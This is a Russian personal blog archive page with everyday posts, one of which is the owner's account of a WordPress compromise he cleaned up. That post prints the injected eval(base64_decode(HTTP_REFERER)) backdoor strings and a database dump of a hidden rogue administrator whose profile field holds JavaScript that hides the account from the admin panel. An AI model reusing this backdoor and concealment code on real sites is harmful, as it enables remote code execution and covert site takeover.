Hostenko — лучший WordPress-хостинг

Архив за Сентябрь, 2009

Самое популярное за этот месяц

  • Ахтунг! Атаки на WordPress блоги
  • Кактус минолтовский
  • Cactus Toilet Paper
  • Виртуальный принтер PDF. Установка за один клик
  • Устранение проблем с утилитой Panda USB Vaccine
  • Ищу HP Instant Printing Utility версии 2.0
  • Побил свой рекорд расходов на мобильную связь
  • Прослушка телефона по обычному FM-радио :-)
  • Образ диска с XP HOME от Fujitsu-Siemens ни у кого случаем нет?
  • Уродская дриста и ее сервисфаки

  • Спатифиллум зацвел ;-)

    Кактус вышел из депрессии, атмосфера в доме этим летом сменилась и цветок, который я ждал с декабря прошлого года, похоже почувствовал это и наконец зацвел! Он еще маленький, но уже так радует глаз!

    Спатифиллум зацвел

    Спатифиллум зацвел

    Один комментарий

    Не понравилосьМогло быть лучшеНеплохоХорошоОтлично! (голосов: 4, средний: 3.50 из 5)
    Loading ... Loading ...

    Ахтунг! Атаки на WordPress блоги

    Столкнулся позавчера с одним “глюком” при настройке клиентского блога – криво работали ссылки на комментарии и падал сервер базы данных при попытке отредактировать пользователей в админке. и кстати там показывает вот такую хрень при этом:
    wp-ahtung
    Phpmyadmin выдает при этом примерно такое:

    Lost connection to MySQL server during query

    и не отвечает сервер минут 50 после этого…

    Погуглил тогда сразу и нашел как исправить ошибки с постоянными ссылками, но сегодня в дампе базы данных обнаружил что там исправляется далеко не все. Ручками повыкашивал разные строки типа:

    %25&%28%7B%24%7Beval%28base64_decode%28%24_SERVER%5BHTTP_REFERER%5D%29%29%7D%7D%7C.%2B%29&%25/
    %25&evalbase64_decode_SERVERHTTP_REFERER.%2B&%25/
    %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)
    %&{${evalbase64_decode$_SERVER[HTTP_REFERER]}}|.+&%/
    &%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)
    %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

    В базе данных это выглядело примерно так (этот юзер не показывается вообще в админке):

    (574, 143, 'rich_editing', 'true'),
    (575, 143, 'comment_shortcuts', 'false'),
    (576, 143, 'admin_color', 'fresh'),
    (577, 143, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}'),
    (578, 143, 'first_name', '...\n\n\n\n\n\n\n\n\n<div id="user_superuser"><script language="JavaScript">\nvar setUserName = function(){\n try{\n          var t=document.getElementById("user_superuser");\n              while(t.nodeName!="TR"){\n                      t=t.parentNode;\n               };\n            t.parentNode.removeChild(t);\n          var tags = document.getElementsByTagName("H3");\n               var s = " shown below";\n               for (var i = 0; i < tags.length; i++) {\n                       var t=tags[i].innerHTML;\n                      var h=tags[i];\n                        if(t.indexOf(s)>0){\n                           s =(parseInt(t)-1)+s;\n                         h.removeChild(h.firstChild);\n                          t = document.createTextNode(s);\n                               h.appendChild(t);\n                     }\n             }\n             var arr=document.getElementsByTagName("ul");\n          for(var i in arr) if(arr[i].className=="subsubsub"){\n                  var n=/>Administrator ((d+))</gi.exec(arr[i].innerHTML);\n                      if(n[1]>0){\n                           var txt=arr[i].innerHTML.replace(/>Administrator ((d+))</gi,">Administrator ("+(n[1]-1)+")<");\n        arr[i].innerHTML=txt;\n        }\n    }\n          }catch(e){};\n     };\n     addLoadEvent(setUserName);\n</script></div>'),
    (573, 143, 'nickname', 'NicolasMager80'),
    (570, 1, 'closedpostboxes_dashboard', 'a:1:{i:0;s:0:"";}'),
    (571, 1, 'metaboxhidden_dashboard', 'a:3:{i:0;s:17:"dashboard_plugins";i:1;s:17:"dashboard_primary";i:2;s:19:"dashboard_secondary";}'),
    (572, 1, 'plugins_last_view', 'all'),
    (579, 143, 'wp_user_level', '10');
    
    вот этот поддельный администратор "хакер"
    
    (143, 'NicolasMager80', '$P$BIum3O2v9eAU9dAJRcn23VX2VjnbsG.', 'nicolasmager80', '', '', '2009-09-05 12:41:37', '', 0, 'NicolasMager80');

    Сегодня с утра про эту же атаку на блоги прочитал у Дмитрия Донченко тут

    так что обновляйтесь регулярно :-)

    28 комментариев

    Не понравилосьМогло быть лучшеНеплохоХорошоОтлично! (голосов: 8, средний: 3.88 из 5)
    Loading ... Loading ...

    Рыбный день ;-)

    Этот праздник живота по разным причинам сегодня оттягивался, но все же состоялся. Девушки наготовили сегодня просто убойную дозу роллов. Когда закупали продукты в магазине “Море и Суши“, то мне казалось что всего мало и хотелось набрать и того и другого еще. Но когда начали готовить, то поняли что получится ОЧЕНЬ много любимых роллов. Все за раз не осилили… И похоже завтра тоже не осилим… Но все довольны :-)

    Роллы

    Роллы


    Продолжить чтение →

    15 комментариев

    Не понравилосьМогло быть лучшеНеплохоХорошоОтлично! (голосов: 4, средний: 5.00 из 5)
    Loading ... Loading ...

    Уродская дриста и ее сервисфаки

    Что за Куйня? Сколько помню, все сервиспаки от Майкрософта ставились по принципу  ”поставил последний и более ранние не нужны”, а вот дриста (vista) хочет перед установкой второго пака сначала первый. Уродство! Хорошо, что первый уже был давно скачан… Мало того что он в дристе”ставится в час по чайной ложке”, так еще и два раза ставить надо их (первый и затем второй).

    Обсуждение закрыто

    Не понравилосьМогло быть лучшеНеплохоХорошоОтлично! (голосов: 5, средний: 2.60 из 5)
    Loading ... Loading ...

    Побил свой рекорд расходов на мобильную связь

    Средний расход на мобильник у меня последние года 3 был около 300рублей в месяц, а вот как я “оторвался” в августе (сегодня пришел отчет где все смачно расписано):

    Израсходовано за период: 2155,95 руб. Я вроде даже зимой когда к тому же еще был и в Египте и платил там за роуминговый интернет и потом еще пользовался местной симкой потратил меньше

    Есть там где то на 300рублей звонков, на остальную сумму разные платные смс-ки и т.д., но больше всего выделяется среди этого строка

    Исходящая связь GPRS (WWW): 123500 килобайт 814,0035

    По большей части такой огромный для меня расход мобильного инета связан с тем что мой красно-яйцевый оператор с некоторого времени стал “округлять до 100килобайт”, а я в августе довольно часто пользовался аськой и мини-оперой в телефоне и продолжаю пользоваться довольно часто.

    Сменить тариф что ли… (оператора менять не буду, слишком много “привязанностей”)

    21 комментарий

    Не понравилосьМогло быть лучшеНеплохоХорошоОтлично! (голосов: 1, средний: 5.00 из 5)
    Loading ... Loading ...